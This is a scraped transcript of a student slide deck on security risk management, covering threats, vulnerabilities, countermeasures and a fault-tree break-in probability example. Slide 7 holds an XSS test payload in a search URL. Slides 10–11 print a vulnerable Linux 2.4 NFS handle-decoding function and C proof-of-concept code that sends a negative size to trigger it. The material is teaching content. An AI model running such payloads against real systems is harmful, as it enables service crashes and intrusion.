Presentation is loading. Please wait.

Presentation is loading. Please wait.

Risk Management Company name Prepared By Mahmoud elmadhoun Supervised By Ms : eman elagrami.

Published byFerdinand Norman Modified over 9 years ago

Similar presentations

Presentation on theme: "Risk Management Company name Prepared By Mahmoud elmadhoun Supervised By Ms : eman elagrami."— Presentation transcript:

1 Risk Management Company name Prepared By Mahmoud elmadhoun Supervised By Ms : eman elagrami

2 Agenda The definition of Risk, and the sections Countermeasures in the event of Risk How to manage the Risk and probability

3 The definition of Risk and the sections The Risk is there is probably a threat and therefore can be exploited if used that threat might be called the Vulnerability Of this definition could be to separate the main sections of the Risk  Threat-: is the process of trying to access to confidential information of the Organization  Vulnerabilities: and that there are weaknesses in the organization can engage in which the attacker

4

5 Vulnerabilities Composed of two types and two  Technical Vulnerability :whether weak immunization and use of this vulnerability before the attacker knows the attack, the attack of technical  Administrative Vulnerability : Attack is the so-called non-technical or social engineering attack

6 Vulnerabilities And can be divided in terms of ease and difficulty of the two  High-level Vulnerability: an example is easy to use in writing software code to exploit that gap  Low-level Vulnerability: is the use of the most difficult and requires a lot of sources of financial sources or a long time the attacker

7 Example Vulnerability of XSS ( Cross Site Scripting ) HTML,JavaScript,VBscript,ActiveX,Flash ) Amend the URL address for a given site alert('Welcome') http://www.example.com/search?keyword= alert('Welcome') http://www.example.com/search?keyword=

8 Please login with the form below before proceeding: Login: Password:

9

10 Vulnerabilities unsigned linux-2.4, signed/unsigned static inline u32* decode_fh(u32 *p, struct svc_fh *fhp) { unsigned int size; fh_init(fhp, NFS3_FHSIZE); size = ntohl(*p++); if (size > NFS3_FHSIZE) return NULL; memcpy(&fhp->fh_handle.fh_base, p, size); fhp->fh_handle.fh_size = size; return p + XDR_QUADLEN(size); }

11 كود#include #include #define NFSPROG 100003 #define NFSVERS 3 #define NFSPROC_GETATTR 1 static struct diropargs heh; bool_t xdr_heh(XDR *xdrs, diropargs *heh) { int32_t werd = -1; return xdr_int32_t(xdrs, &werd); } int main(void) { CLIENT * client; struct timeval tv; client = clnt_create("marduk", NFSPROG, NFSVERS, "udp"); if(client == NULL) { perror("clnt_create\n"); } tv.tv_sec = 3; tv.tv_usec = 0; client->cl_auth = authunix_create_default(); clnt_call(client, NFSPROC_GETATTR, (xdrproc_t) xdr_heh, (char *)&heh, (xdrproc_t) xdr_void, NULL, tv); return 0; }

12 Threat There are three essential components of a threat  Target  Agent  Event

13 Target Is the organization's information and the attacker can work on each of the following  Confidentiality: disclosure and that the confidential information to others  Integrity: possibility of changing the organization's information  Availability: and by denial of service via Dos  Accountability: It is not punished for it by the attacker to conceal the attack

14 Agents There must be three features  Access to the target: it may be a direct access to any account has to enter the system and may be indirectly through an intermediary  Knowledge about the target  Motivation

15 Events Is in many ways be the most important and ill-authorized access, and others authorized to information or the system either through the development of malicious codes (viruses or Trojan) of the Regulations

16 Countermeasures in the event of Risk There is no doubt that the information varies from facility to facility and information according to the institution by institution, the importance of information to take appropriate action may be to intervene before a danger, and called the Proactive Model and intervention may be after the occurrence of danger and called the Reactive Model

17 Countermeasures in the event of Risk There are some examples of countermeasures to the threat or attack  Firewalls  Anti-virus software  Access Control  Two-factor authentication systems  Well-trained employees

18 How to manage the Risk and probability Steps involved in risk management  Risk Analysis  Decision Management  Implementation

19 How to manage the Risk and probability Risk management, where intervention is divided into two sections:  Reactive Model : It is a very famous type is the so-called emotional intervention For example, a security official in the company to download anti-virus program after the virus is spreading and destroying some devices can be calculated as follows Protection cost = total cost of the risk + the cost of countermeasures

20 How to manage the Risk and probability  Proactive Model :Prior to the Risk of this type is much better in terms of cost Protection cost = cost of the minimum risk + the cost of countermeasures

21 How to manage the Risk and probability Account the possibility of a threat:  the beginning of the top of any tree to be in the form of  The search for the roads leading to the occurrence of or potential threat  The collection of these methods to use (or,And(  to calculate the potential, we start from the top down

22 How to manage the Risk and probability

23 Example When the attacker tries to break the password Root Either that the attacker tries to find the root of the word by guessing Guessing the root password Or attack the network as a whole to try and there Bugs in the network And at this point is to achieve two of Bugs 1-there are gaps that can be exploited (And, or) must verify the condition II with 2- that does not happen the system (b Trigram any potential path for this gap

24 How to manage the Risk and probability

25 P(guessing root password = A) = 5/1000 = 0.005 P(exploiting (( active server = B) = 50 /1000 = 0.05 (AND) P (system is not updated or not configured properly =C) = 0.1

26 How to manage the Risk and probability Assumptions made in the guess a password equal to the exploitation of the gap and b, the latter if there is no system c P(attack service =BC) = P(B)*P(C) = 0.05 * 0.1 = 0.005 ( AND) P(break-in = (total)(P(A)+P(BC)-P(A)P(BC) = 0.005+0.005 – 0.005 *0.005 = 0.009975 ( OR) (Total Probability ) break0in 0.009975.

27 Reference http://www.c4arab.com/showlesson.php?lesid=1756 http://www.c4arab.com/showlesson.php?lesid=175 Prentice.Hall.Cryptography.and.Network.Security.4t h.Edition.Nov.2005

28

Download ppt "Risk Management Company name Prepared By Mahmoud elmadhoun Supervised By Ms : eman elagrami."

Similar presentations

Driving Factors Security Risk Mgt Controls Compliance.

Driving Factors Security Risk Mgt Controls Compliance.
Chapter 1 - 1 ADCS CS262/0898/V1 Chapter 1 An Introduction To Computer Security TOPICS Introduction Threats to Computer Systems –Threats, Vulnerabilities.

Chapter ADCS CS262/0898/V1 Chapter 1 An Introduction To Computer Security TOPICS Introduction Threats to Computer Systems –Threats, Vulnerabilities.
CS5038 The Electronic Society

CS5038 The Electronic Society
Laptop Security in the current IT world W3 group.

Laptop Security in the current IT world W3 group.
Database Security Policies and Procedures and Implementation for the Disaster Management Communication System Presented By: Radostina Georgieva Master.

Database Security Policies and Procedures and Implementation for the Disaster Management Communication System Presented By: Radostina Georgieva Master.
OSG Computer Security Plans Irwin Gaines and Don Petravick 17-May-2006.

OSG Computer Security Plans Irwin Gaines and Don Petravick 17-May-2006.
Engineering Secure Software. Uses of Risk Thus Far  Start with the functionality Use cases  abuse/misuse cases p(exploit), p(vulnerability)  Start.

Engineering Secure Software. Uses of Risk Thus Far  Start with the functionality Use cases  abuse/misuse cases p(exploit), p(vulnerability)  Start.
Is There a Security Problem in Computing? Network Security / G. Steffen1.

Is There a Security Problem in Computing? Network Security / G. Steffen1.
Mr C Johnston ICT Teacher

Mr C Johnston ICT Teacher
Chap 1: Overview Concepts of CIA: confidentiality, integrity, and availability Confidentiality: concealment of information –The need arises from sensitive.

Chap 1: Overview Concepts of CIA: confidentiality, integrity, and availability Confidentiality: concealment of information –The need arises from sensitive.
1 Protection Protection = access control Goals of protection Protecting general objects Example: file protection in Linux.

1 Protection Protection = access control Goals of protection Protecting general objects Example: file protection in Linux.
Course ILT Security overview Unit objectives Discuss network security Discuss security threat trends and their ramifications Determine the factors involved.

Course ILT Security overview Unit objectives Discuss network security Discuss security threat trends and their ramifications Determine the factors involved.
1 Pertemuan 6 Points of Exposure Matakuliah:A0334/Pengendalian Lingkungan Online Tahun: 2005 Versi: 1/1.

1 Pertemuan 6 Points of Exposure Matakuliah:A0334/Pengendalian Lingkungan Online Tahun: 2005 Versi: 1/1.
Network and Server Attacks and Penetration Chapter 12.

Network and Server Attacks and Penetration Chapter 12.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Copyright © 2002 Pearson Education, Inc. Slide 5-1 PERTEMUAN 8.

Copyright © 2002 Pearson Education, Inc. Slide 5-1 PERTEMUAN 8.
Lecture 11 Reliability and Security in IT infrastructure.

Lecture 11 Reliability and Security in IT infrastructure.
Web server security Dr Jim Briggs WEBP security1.

Web server security Dr Jim Briggs WEBP security1.
Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.

Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.
Security Overview. 2 Objectives Understand network security Understand security threat trends and their ramifications Understand the goals of network.

Security Overview. 2 Objectives Understand network security Understand security threat trends and their ramifications Understand the goals of network.

Similar presentations

Ads by Google